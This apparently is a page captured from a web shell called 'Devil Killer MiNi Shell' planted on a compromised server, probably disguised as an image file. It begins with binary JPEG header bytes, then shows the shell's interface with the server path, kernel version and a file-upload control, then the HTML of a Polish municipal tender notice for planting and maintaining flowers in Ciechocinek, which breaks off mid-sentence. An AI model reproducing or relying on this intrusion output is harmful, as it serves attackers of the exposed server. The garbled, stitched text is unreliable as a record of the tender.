JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240216/0020613601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i nasadzenie kwiatów oraz konserwacja nasadzeń:<br/>1)Dostawa roślin – kwiatów jednorocznych , nasadzenie roślin i konserwacja tych nasadzeń;<br/>2)Utrzymanie i konserwacja nasadzeń wieloletnich. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA CIECHOCINEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866399</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechocinek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-720</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ratusz@ciechocinek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ciechocinek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i nasadzenie kwiatów oraz konserwacja nasadzeń:<br/>1)Dostawa roślin – kwiatów jednorocznych , nasadzenie roślin i konserwacja tych nasadzeń;<br/>2)Utrzymanie i konserwacja nasadzeń wieloletnich. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0f0ee3a1-cca8-11ee-a3b5-e25d731b0da9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00206136</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00024281/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa roślin - 1) kwiatów jednorocznych do obsadzeń rabat i dywanów kwiatowych i konserwacja tych nasadzeń, - 2) dostawa roślin dwuletnich do obsadzeń rabat kwiatowych i konserwacja tych nasadzeń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0f0ee3a1-cca8-11ee-a3b5-e25d731b0da9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-0f0ee3a1-cca8-11ee-a3b5-e25d731b0da9</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym odbywa się przy użyciu platformy e-Zamówienia (ezamowienia.gov.pl). We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub ID postępowania).<br/>2)	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email ratusz@ciechocinek.pl, srodowisko@ciechocinek.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA DO SPECYFIKACJI<br/><br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję osoby fizyczne, których dane są zbierane w trakcie niniejszego postępowania że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Miejska Ciechocinek, reprezentowana przez Burmistrza, z siedzibą w Ciechocinku przy ul. Kopernika 19 <br/>tel. 54 4161800, faks 54 2836423, e-mail ratusz@ciechocinek.pl <br/>2) inspektorem ochrony danych osobowych w Gminie Miejskiej Ciechocinek jest Pan Mirosław Ciuryło tel. 54 4161800, e-mail iod@ciechocinek.pl <br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na świadczenie usług w zakresie: Dostawa i nasadzenie kwiatów oraz konserwacja nasadzeń:<br/>1)	dostawa roślin – kwiatów jednorocznych do obsadzeń rabat i dywanów kwiatowych nasadzenie tych roślin i konserwacja tych nasadzeń,<br/>2)	utrzymanie i konserwacja nasadzeń wieloletnich na rabatach prowadzonym w trybie podstawowym;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej „ustawa Pzp”; <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac (dostawa kwiatów jednorocznych, nasadzenie i konserwacja tych nasadzeń ) do wykonania obejmuje następujące tereny:<br/>	<br/>	1) Partery Hellwiga<br/>a) Wazony kwiatowe Aleja Armii Krajowej 27 m²<br/>b) Rabata przed budynkiem „EUROPA” 96 m²	<br/>c) Rabaty przy pergoli 345 m²<br/>d) Rabaty przy dywanie 352 m²<br/>e) 2 rabaty przed fontanną 208 m²<br/>f) 2 rabaty za fontanną 246 m²<br/>g) 2 rabaty za ul. Raczyńskich 156 m²<br/>h) Dywan kwiatowy 2 części 172 m²	<br/>i) 2 rabaty przy wejściu do Łazienek nr 1 12 m²<br/>	j) 2 rabaty wokół fontanny Windsor 565 m²<br/><br/>	2) Teren zielony od fontanny „GRZYB” do ul. 3 Maja<br/>a) Wazony ul. Kościuszki – Zdrojowa 70 m² <br/>b) Kalendarz kwiatowy 27 m²	<br/>c) Rabata na skwerze przy Dyr. PUC S.A. 38 m²<br/>d) Rabaty przy ul. 3 Maja 145 m²	<br/>e) Rabata przy pomniku Igantowskiego 4 m2<br/><br/>	3) Park Zdrojowy<br/>a) Klomb 432 m²<br/>b) Rabaty wokół klombu i przy kamiennym pawiu 234,9 m²<br/>c) Rabaty przed Muszlą Koncertową 54,0 m²<br/>d) Kwietniki koliste wzdłuż głównej alei 43,5 m²<br/>e) Rzeźba kwiatowa w kształcie wiewiórki 5,0 m²<br/>f) Rzeźba kwiatowa w kształcie pawia 5,0 m²<br/>g) Rzeźba kwiatowa w kształcie łabędzia 5,0 m²<br/>h) Rabata przy fontannie ŻABKA 16,5 m²<br/><br/> 4) Park Tężniowy<br/>a) Narożnik ul. Tężniowa (skalniak) 36 m²	<br/>b) Gazony ul. Tężniowa 2 m²	<br/>c) Zegar kwiatowy 121 m²<br/><br/> 5) Pasaż zieleńców od pomnika Traugutta do ul. Mickiewicza<br/>a) Rabata przy pomniku Traugutta 15 m²	<br/>b) Rabaty przed kościołem 101 m²<br/>c) Rabata za ul. 3 Maja 29 m²<br/>d) Rabata za kościołem 146 m²<br/><br/>	6) Pojedyncze rabaty śródmiejskie<br/>a) Rabata przy hali targowej 15 m²	<br/>b) Rabata przy barze „Tęcza” 121 m²	<br/>c) Rabata przy Urzędzie Miejskim 29 m²	<br/>d) Rabaty przy fontannie Grzyb 34 m2<br/>e) Rabata przy budynku Promocji 3 m²<br/>f) Zwisy ulica Zdrojowa , Żelazna, Tężniowa ( 40 sztuk ) 24,5 m²<br/><br/>	7) Obszar zieleńca za Teatrem Letnim<br/>a) Rabata przed Teatrem Letnim 85 m²<br/>b) Rabata od ul. Zdrojowej 39 m²<br/><br/>8) Plac Gdański - rabata 420 m2 z czego :<br/>a) 148,00 m² do obsadzeń roślinami jednorocznymi,<br/>b) 272,00 m2 obsadzone roślinami wieloletnimi do utrzymania całorocznego<br/><br/>R a z e m powierzchnia rabat 4 207,40 m2<br/><br/> <br/>5.2 Utrzymanie i pielęgnacja rabat kwiatowych obsadzonych bylinami, krzewami i różami w miejscach:<br/><br/>Rabata za pomnikiem Traugutta - różanka 370 m²<br/> Rondo ulica Zdrojowa 90 m2<br/>Park Sosnowy: rabaty i gazony	153 m2<br/>Rabata przy pomniku Staszica	472 m2<br/> Rabaty wjazd z ul. Kopernika	91 m2<br/> Rabata ul. Narutowicza/Kolejowa	106 m2<br/> Rabata ul. Kopernika (PKS)	108 m2 <br/> Rabata ul. Mickiewicza	35 m2<br/> Rabata ul. Warzelniana	32 m2<br/><br/>5.3 Szczegółowy zakres czynności objętych zamówieniem:<br/>1) Użyźnianie podłoża przed dokonaniem nasadzeń obejmujące m.in. odchwaszczanie i sprzątanie, spulchnienie, napowietrzenie i poprawianie struktury ziemi, przygotowanie podłoża pod konkretne rośliny, nawożenie,<br/>	2) Obsadzanie rabat materiałem własnym w I (pierwszym) gatunku kwiatów.<br/>3) Rabaty takie jak:<br/>- dywan (ust. 5.1 pkt.1 lit. h), kalendarz ( ust. 5.1 pkt. 2 lit. b) - obsadzenie z użyciem roślin w I (pierwszym) gatunku o małej intensywności wzrostu i krzewienia się z wymogiem ilości kwiatów na 1 m2 od 50 do 100 sztuk przy użyciu wyłącznie następujących gatunków roślin: ageratum tylko po obwodzie przy trawniku, coleus w kolorach, echeveria – w kolorach, iresine, achyranthes, alternanthera – dwa rodzaje – czerwona, zielona, selaginella, sedum, begonia semperflorens (w niewielkiej ilości),<br/>- zegar (ust. 5.1 pkt. 4 lit. c)- obsadzenie z użyciem roślin w I (pierwszym) gatunku o małej intensywności wzrostu i krzewienia się z wymogiem ilości kwiatów na 1 m2 od 35 do 50 sztuk przy użyciu wyłącznie następujących gatunków roślin: ageratum tylko po obwodzie przy trawniku, coleus w kolorach, echeveria – w kolorach, iresine, achyranthes, alternanthera – dwa rodzaje – czerwona, zielona, selaginella, sedum, begonia semperflorens w niewielkiej ilości )<br/>- obsadzenie rzeźb wiewiórki, pawia i łabędzia (ust. 5.1 pkt. 3 lit. e, f, g) przy użyciu następujących roślin: alternantera, penisteum setaceum „rubru”, begonii, rojniki, żeniszek, echeveria ,<br/>3) Obsadzenia pozostałych rabat w I (pierwszym) gatunku roślin w formie kompozycji dywanowych przyjmując zagęszczenie roślin - 35 sztuk na 1m2 z użyciem min. pelargonii rabatowej i begonii bulwiastej, gazanii. <br/>4) Obsadzenie zwisów ul. Zdrojowa, ul. Żelazna, ul. Tężniowa (40 sztuk) (ust. 5.1 pkt. 6, lit. f) wyłącznie pelargonią bluszczolistną ( pelargonium peltatum ),<br/>5) Obsadzenie rabat objętych przetargiem w I (pierwszym) gatunku kwiatów następującymi gatunkami i w następujących wymaganych ilościach:<br/>- pelargonium ( pelargonia rabatowa ) – minimalna ilość 21 tys. sztuk,<br/>- tuberhybrida ( begonia bulwiasta ) - minimalna ilość 28 tys. sztuk,<br/>- sedum letnie - minimalna ilość – 6 tys. sztuk,<br/>- pelargonia zwisająca – minimalna ilość - 2 tys. sztuk, <br/>- begonia dragon - minimalna ilość 1 tys. szt,<br/>- begonia semperflores– minimalna ilość 43 tys. sztuk,<br/>- ageratum (żeniszek ) – minimalna ilość 15 tys. sztuk,<br/>- salvia (szałwia w odmianach i kolorach) - minimalna ilość 15 tys. sztuk,<br/>- dalia figaro – minimalna ilość 15 tys. sztuk,<br/>- mrozy – minimalna ilość 12 tys. sztuk,<br/>- echeveria- minimalna ilość 15 tys. sztuk,<br/>- achyranthes- minimalna ilość 15 tys. sztuk,<br/>- alternanthera – minimalna ilość 14 tys. sztuk,<br/>- iresine - minimalna ilość 14 tys. sztuk,<br/>- chlorofytum (zielistek) - minimalna ilość 15 tys. sztuk,<br/>- verbena bonariensis (werbena patagońska) ilość 3 tys. sztuk<br/>- tagetes ( turek ) – ilość około 16 tys. sztuk -maksymalna ilość<br/>- trawy ozdobne w odmianach i kolorach – maksymalna ilość 650 sztuk,<br/>- prantus minimalna ilość 1200 sztuk,<br/>- ipomoea minimalna ilość 600 sztuk,<br/>- surfinia mix - minimalna ilość 1000 sztuk,<br/>- petunia mix - minimalna ilość 10 tys. sztuk,<br/>- pilea - minimalna ilość 6 tys. sztuk,<br/>- heliotrop - minimalna ilość 6 tys. sztuk,<br/>Łącznie dla zadania nie mniej niż 275450 sztuk kwiatów<br/><br/>6) Naprawa przy użyciu własnych materiałów obrzeży rabat.<br/>7) Wymiana uszkodzonych palików wokół kalendarza kwiatowego przed wykonaniem nasadzeń i na bieżąco w przypadku ich wystąpienia w trakcie obowiązywania umowy. <br/>8) Utrzymywanie w stałej sprawności mechanizmu zegara kwiatowego.<br/>9) Uzupełnienie trawnika przy nowo posadzonych krzewach na terenie dywanu kwiatowego.<br/>10) Uzupełnienie ziemi w rabatach: dywan kwiatowy, zegar kwiatowy, rabata na zieleńcu za Teatrem Letnim, rabata Plac Gdański.<br/>11) Dostawca we własnym zakresie i na własny koszt uzupełniał będzie ubytki w nasadzeniach do 10 % ogólnych nasadzeń.<br/>12) Koszty zakupu wody dla potrzeb podlewania rabat ponosi Zamawiający.<br/><br/>5.4. Wyszczególnienie prac pielęgnacyjnych wykonanych nasadzeń:<br/>1) Systematyczne odchwaszczanie, podlewanie, zasilanie rabat kwiatowych, zwalczanie chorób i szkodników przez cały okres wegetacji (częstotliwość dostosowana do warunków atmosferycznych, wymagań gatunkowych roślin, zgodnie ze sztuką ogrodniczą).<br/>2) Koszenie trawników przyległych do rabat kwiatowych na szerokości 1m.<br/>3) Uprzątanie roślin po zakończonej wegetacji nie wcześniej niż po 15 października.<br/>4) Usunięcie odpadów i nieczystości zebranych przy oczyszczaniu rabat i kwietników.<br/>5) Wykonywanie codziennej aktualizacji daty na kalendarzu kwiatowym z użyciem materiału roślinnego.<br/>6) Utrzymywanie i pielęgnacja istniejących rabat z nasadzeniem róż, bylin i krzewów (ust. 5.2) polegająca na bieżącej konserwacji, zwalczaniu chorób i szkodników, nawożeniu oraz zabezpieczaniu roślin na okresy zimowe (częstotliwość dostosowana do warunków atmosferycznych, wymagań gatunkowych roślin, zgodnie ze sztuką ogrodniczą) oraz dokonywanie nasadzeń uzupełniających z powierzonego materiału roślinnego. <br/>7) Utrzymywanie w stałej sprawności systemów nawadniania roślin znajdujących się na rabatach kwiatowych, dywanach oraz opróżnianie rur systemu nawadniania z wody na okres zimowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03121100-6 - Żywe rośliny, bulwy, korzenie, sadzonki i rozsady</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Uzupełnianie ubytków w nasadzeniach własnym zakresie i na własny koszt do 10% - 0 pkt. Pow.10% - 40 pkt.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki dotyczące:<br/>a) posiadania wiedzy i doświadczenia; <br/>Zamawiający uzna, że Wykonawca spełnia warunek posiadania niezbędnej wiedzy i doświadczenia w wykonywaniu prac będących przedmiotem zamówienia, jeżeli wykaże, iż w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie prowadził produkcje kwiatów na powierzchni 5000,00 m² . <br/>b) dysponowania odpowiednim potencjałem technicznym oraz potencjałem kadrowym<br/>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż dysponuje lub będzie dysponował odpowiednim potencjałem technicznym, tj. min. 3 kosiarkami, 3 wykaszarkami, 2 pojazdami o maksymalnej masie całkowitej do 3,5t do transportu 